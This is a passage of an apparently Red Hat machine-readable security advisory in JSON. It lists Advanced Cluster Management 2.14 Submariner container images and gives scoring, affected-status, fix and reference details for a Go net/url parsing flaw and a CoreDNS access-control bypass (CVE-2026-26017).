"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "net/url: Incorrect parsing of IPv6 host literals in net/url"
},
{
"cve": "CVE-2026-26017",
"cwe": {
"id": "CWE-367",
"name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
},
"discovery_date": "2026-03-06T16:01:45.971241+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445244"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in CoreDNS, a DNS server that uses a chain of plugins. This logical vulnerability allows an attacker to bypass DNS access controls. The issue occurs because security plugins, such as \u0027acl\u0027, are evaluated before the \u0027rewrite\u0027 plugin, creating a Time-of-Check Time-of-Use (TOCTOU) flaw. This flaw enables an attacker to circumvent intended access restrictions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/coredns/coredns: CoreDNS: DNS access control bypass due to plugin execution order flaw",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26017"
},
{
"category": "external",
"summary": "RHBZ#2445244",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445244"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26017",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26017"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26017",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26017"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/releases/tag/v1.14.2",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/security/advisories/GHSA-c9v3-4pv7-87pr",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-c9v3-4pv7-87pr"
}
],
"release_date": "2026-03-06T15:36:15.655000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
